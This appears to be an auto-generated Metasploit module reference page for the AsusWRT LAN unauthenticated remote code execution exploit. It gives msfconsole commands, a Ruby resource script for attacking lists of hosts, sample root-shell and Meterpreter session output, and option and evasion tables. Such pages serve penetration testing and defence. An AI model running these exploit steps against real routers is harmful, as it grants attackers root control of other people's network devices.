AsusWRT LAN Unauthenticated Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/asuswrt_lan_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: AsusWRT LAN Unauthenticated Remote Code Execution
Module: exploit/linux/http/asuswrt_lan_rce
Source code: modules/exploits/linux/http/asuswrt_lan_rce.rb
Disclosure date: 2018-01-22
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 9999
List of CVEs: CVE-2018-5999, CVE-2018-6000

The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode. This command mode can then be abused by sending a UDP packet to infosvr, which is running on port UDP 9999 to directly execute commands as root. This exploit leverages that to start telnetd in a random port, and then connects to it. It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using asuswrt_lan_rce against a single host

Normally, you can use exploit/linux/http/asuswrt_lan_rce this way:

msf > use exploit/linux/http/asuswrt_lan_rce
msf exploit(asuswrt_lan_rce) > show targets
    ... a list of targets ...
msf exploit(asuswrt_lan_rce) > set TARGET target-id
msf exploit(asuswrt_lan_rce) > show options
    ... show and set options ...
msf exploit(asuswrt_lan_rce) > exploit

Using asuswrt_lan_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your asuswrt_lan_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/asuswrt_lan_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a vulnerability in AsusWRT to execute arbitrary commands as root.

Vulnerable Application


The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode.

This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the root user.

This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.

Numerous ASUS models are reportedly affected, but untested.

Verification Steps


  1. Start msfconsole
  2. use exploits/linux/http/asuswrt_lan_rce
  3. set RHOST [IP]
  4. run
  5. You should get a root session

Options


ASUSWRTPORT

AsusWRT HTTP portal port (default: 80)

Scenarios


msf > use exploit/linux/http/asuswrt_lan_rce msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 rhost => 192.168.132.205 msf exploit(linux/http/asuswrt_lan_rce) > run

[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. [] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 [+] 192.168.132.205:9999 - Success, shell incoming! [] Found shell. [*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600

id id /bin/sh: id: not found / # cat /proc/cpuinfo cat /proc/cpuinfo system type : Broadcom BCM53572 chip rev 1 pkg 8 processor : 0 cpu model : MIPS 74K V4.9 BogoMIPS : 149.91 wait instruction : no microsecond timers : yes tlb_entries : 32 extra interrupt vector : no hardware watchpoint : yes ASEs implemented : mips16 dsp shadow register sets : 1 VCED exceptions : not available VCEI exceptions : not available

unaligned_instructions : 0 dcache hits : 2147483648 dcache misses : 0 icache hits : 2147483648 icache misses : 0 instructions : 2147483648 / #

Go back to menu.

Msfconsole Usage


Here is how the linux/http/asuswrt_lan_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/asuswrt_lan_rce

[*] Using configured payload cmd/unix/interact
msf6 exploit(linux/http/asuswrt_lan_rce) > show info

       Name: AsusWRT LAN Unauthenticated Remote Code Execution
     Module: exploit/linux/http/asuswrt_lan_rce
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-01-22

Provided by:
  Pedro Ribeiro <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   AsusWRT < v3.0.0.4.384.10007

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    9999             yes       The target port (UDP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  The HTTP server in AsusWRT has a flaw where it allows an 
  unauthenticated client to perform a POST in certain cases. This can 
  be combined with another vulnerability in the VPN configuration 
  upload routine that sets NVRAM configuration variables directly from 
  the POST request to enable a special command mode. This command mode 
  can then be abused by sending a UDP packet to infosvr, which is 
  running on port UDP 9999 to directly execute commands as root. This 
  exploit leverages that to start telnetd in a random port, and then 
  connects to it. It has been tested with the RT-AC68U running AsusWRT 
  Version 3.0.0.4.380.7743.

References:
  https://blogs.securiteam.com/index.php/archives/3589
  https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt
  https://seclists.org/fulldisclosure/2018/Jan/78
  https://nvd.nist.gov/vuln/detail/CVE-2018-5999
  https://nvd.nist.gov/vuln/detail/CVE-2018-6000

Module Options


This is a complete list of options available in the linux/http/asuswrt_lan_rce exploit:

msf6 exploit(linux/http/asuswrt_lan_rce) > show options

Module options (exploit/linux/http/asuswrt_lan_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    9999             yes       The target port (UDP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   AsusWRT < v3.0.0.4.384.10007

Advanced Options


Here is a complete list of advanced options supported by the linux/http/asuswrt_lan_rce exploit:

msf6 exploit(linux/http/asuswrt_lan_rce) > show advanced

Module advanced options (exploit/linux/http/asuswrt_lan_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ASUSWRTPORT             80                                                  yes       AsusWRT HTTP portal port
   CHOST                                                                       no        The local client address
   CPORT                                                                       no        The local client port
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/interact):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/asuswrt_lan_rce module can exploit:

msf6 exploit(linux/http/asuswrt_lan_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   AsusWRT < v3.0.0.4.384.10007

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/asuswrt_lan_rce exploit:

msf6 exploit(linux/http/asuswrt_lan_rce) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/asuswrt_lan_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/asuswrt_lan_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Failed to set ateCommand_flag variable.


Here is a relevant code snippet related to the "<PEER> - Failed to set ateCommand_flag variable." error message:

83:	    })
84:	
85:	    if res and res.code == 200
86:	      print_good("#{peer} - Successfully set the ateCommand_flag variable.")
87:	    else
88:	      fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.")
89:	    end
90:	
91:	
92:	    # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.
93:	    info_pdu_size = 512                         # expected packet size, not sure what the extra bytes are

<PEER> - Well that didn't work... try again?


Here is a relevant code snippet related to the "<PEER> - Well that didn't work... try again?" error message:

122:	      if not sock.nil?
123:	        print_good("#{peer} - Success, shell incoming!")
124:	        return handler(sock)
125:	      end
126:	    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
127:	      sock.close if sock
128:	    end
129:	
130:	    print_bad("#{peer} - Well that didn't work... try again?")
131:	  end
132:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.